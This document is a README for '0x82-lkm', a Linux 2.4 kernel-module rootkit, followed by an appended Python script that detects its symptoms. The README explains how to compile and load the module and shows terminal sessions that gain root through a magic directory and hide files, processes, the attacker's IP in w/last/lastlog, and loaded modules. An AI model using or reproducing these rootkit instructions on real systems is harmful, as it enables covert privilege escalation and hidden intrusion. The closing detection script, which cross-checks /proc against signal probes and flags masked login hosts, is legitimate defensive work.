Linux LKM (Loadable Kernel Module) Backdoor for Linux kernel v2.4.2

This tool was made for a safer and more complete hack. For now it has only a minimal set of functions, and the version is v0.2. After a short look at the functions, the usage is explained. The implemented functions are as follows.

=-=-=- Functions -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

0x01. SetUID zer0 Backd00r (make directory).
      -. Privilege escalation by creating a specified directory. (uid=0)
0x02. Directory hidden (directory not move).
      -. Hides a directory.
0x03. File hidden (file hide).
      -. Hides a file.
0x04. ls command spoof (file & dir not view).
      -. Deceives the `ls' command.
0x05. ps command spoof (process hide).
      -. Deceives the `ps' command.
0x06. w, netstat, finger, last, lastlog commands spoof (attacker ip hide).
      -. Deceives the w, netstat, finger, last and lastlog commands.
0x07. hidden LKM Backdoor.
      -. Hides a specified loaded module so that it is no longer listed.

The functions above are also described in comments in the code. Next, the method of use is explained.

=-=-=- Usages -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Compile:
bash-2.04# gcc -c 0x82-lkm.c

Install:
bash-2.04# insmod 0x82-lkm.o

attribute:
file - System file.
dir  - Directory.
proc - Process.
ip   - Attacker IP.
mod  - Attacker module.

The LKM is controlled through the cd command:
bash-2.04# cd 'discernment key'-'attribute'-'hide name'
(For reference, the 'discernment key' is 'x82' by default at compile time.)

- Privilege escalation by creating a specified directory. (uid=0) -
bash-2.04$ id
uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
bash-2.04$ mkdir x82-dir
bash-2.04$ id
uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
bash-2.04$

The configured value is "x82-dir" by default; the directory must be created with exactly the name that is configured as the hidden directory name.

- To change the hidden directory name -
bash-2.04$ cd x82-dir-direct
bash: cd: x82: No such file or directory
bash-2.04$ id
uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
bash-2.04$ mkdir direct
bash-2.04$ id
uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
bash-2.04$

With the cd command, "x82-dir-direct" is passed as the argument. The argument is parsed as follows.
x82-dir-direct: x82 (discernment key) - dir (attribute) - direct (hide name)

- File hidden (file hide) -
Discernment key, attribute, hide name: given in the same order, this hides a file or a directory.
example> testfile hidden.
bash-2.04$ touch testfile
bash-2.04$ ls -al testfile
-rw-rw-r--    1 x82      x82             0 Apr 14 23:54 testfile
bash-2.04$ cd x82-file-testfile
bash: cd: x82: No such file or directory
bash-2.04$ ls -al testfile
bash-2.04$ cat testfile
cat: testfile: No such file or directory
bash-2.04$

- ps command spoof (process hide) -
With the matching input, a process can be hidden as follows.
example> login process hidden.
bash-2.04$ ps
  PID TTY          TIME CMD
 8364 pts/1    00:00:00 login
 8442 pts/1    00:00:00 ps
bash-2.04$ cd x82-proc-login
bash: cd: x82: No such file or directory
bash-2.04$ ps
  PID TTY          TIME CMD
 8443 pts/1    00:00:00 ps
bash-2.04$

- To hide the attacker IP -
The IP address is hidden as follows.
(example) Attacker IP: 61.27.144.81
bash-2.04$ cd x82-ip-61.27.144.81
bash: cd: x82: No such file or directory
bash-2.04$ w
 12:11am  up 6 days,  6:46,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
x82      pts/1    ............     11:45pm  0.00s  0.09s  0.01s  w
bash-2.04$ lastlog
x82      pts/1    ............     XXX XXX 14 23:45:29 +0900 2002
bash-2.04$ last
x82      pts/1    ............     XXX XXX 14 23:45   still logged in
x82      pts/1    ............     XXX XXX 14 23:43 - 23:45  (00:02)
x82      pts/1    ............     XXX XXX 14 23:11 - 23:15  (00:03)

wtmp begins XXX XXX 14 23:11:29 2002
bash-2.04$

As shown above, the attacker IP is replaced entirely by '.' (dots).

- To hide the LKM module -
By default, the '0x82-lkm' module is selected to be hidden.
You can change this easily.
bash-2.04# /sbin/lsmod | grep 0x82-lkm
bash-2.04# /sbin/lsmod
Module                  Size  Used by
8139too                16512   1 (autoclean)
usb-uhci               20752   0 (unused)
usbcore                49728   1 [usb-uhci]
bash-2.04# cd x82-mod-usbcore
bash: cd: x82: No such file or directory
bash-2.04# /sbin/lsmod | grep usbcore
bash-2.04#

With this, an LKM written by the attacker can be hidden completely.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

These are the results of testing on my Linux 7.1, kernel 2.4.2. Because it was not tested on other versions, problems may occur. Be careful that the kernel does not die. :-)

Author: Xpl017Elz in INetCop(c).
E-mail: szoahc@hotmail.com & xploit@hackermail.com
Home: http://x82.i21c.net
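The two behaviours the README demonstrates, a process that disappears from `ps` and a host column in `w`/`last` that is overwritten with dots, are also the artefacts a defender would look for on a host suspected of carrying this module. The following is an added example for that purpose; it is not part of the original README or of the 0x82-lkm code. It cross-checks the process list that `ps` derives from reading `/proc` against the set of PIDs that answer `kill(pid, 0)`, and scans `last`-style output for an all-dots host field. The sample `last` lines are constructed, the `pid_max` default of 32768 is an assumption taken from typical 2.4-era kernels, and the function names are this example's own.

```python
import errno
import os
import re

# Constructed sample of `last` output, modelled on the README session above:
# the first entry has its host column replaced by dots, as the module does.
SAMPLE_LAST_OUTPUT = """\
x82      pts/1        ............     Sun Apr 14 23:45   still logged in
alice    pts/0        10.0.0.5         Sun Apr 14 22:10 - 22:30  (00:20)
bob      tty1                          Sun Apr 14 21:00 - 21:05  (00:05)
"""

# A host column consisting only of dots never occurs in genuine utmp/wtmp data.
MASKED_HOST = re.compile(r"^\.{4,}$")


def find_masked_hosts(last_output):
    """Return (user, tty) pairs whose host column is made only of dots."""
    hits = []
    for line in last_output.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        user, tty, host = fields[0], fields[1], fields[2]
        if MASKED_HOST.match(host):
            hits.append((user, tty))
    return hits


def visible_pids():
    """PIDs reported by listing /proc, which is the view `ps` relies on."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probe_pids(max_pid=32768, exists=None):
    """PIDs that respond to kill(pid, 0).

    ESRCH means no such process; EPERM means the process exists but belongs
    to another user, so it still counts as present. `exists` can be replaced
    for testing; by default it performs the real probe.  32768 is the usual
    pid_max of 2.4-era kernels (assumption).
    """
    if exists is None:
        def exists(pid):
            try:
                os.kill(pid, 0)
            except OSError as err:
                return err.errno == errno.EPERM
            return True
    return {pid for pid in range(1, max_pid + 1) if exists(pid)}


def hidden_pids(visible, probed):
    """Processes that answer a signal probe but are absent from the listing."""
    return sorted(probed - visible)


if __name__ == "__main__":
    for user, tty in find_masked_hosts(SAMPLE_LAST_OUTPUT):
        print("masked login host: user=%s tty=%s" % (user, tty))
    if os.path.isdir("/proc"):
        # Probe first, then list, so a process that exits between the two
        # steps shows up as a false "hidden" PID less often; re-run to confirm.
        probed = probe_pids()
        for pid in hidden_pids(visible_pids(), probed):
            print("process %d exists but is not listed in /proc" % pid)
```

The cross-view check works because the module text describes hiding entries from directory listings, while `kill(pid, 0)` takes a different path into the kernel; a module that also hooks that path would defeat it, so treat an empty result as absence of this particular symptom, not as a clean bill of health. Short-lived processes can produce transient mismatches, which is why a hit should be confirmed on a second run.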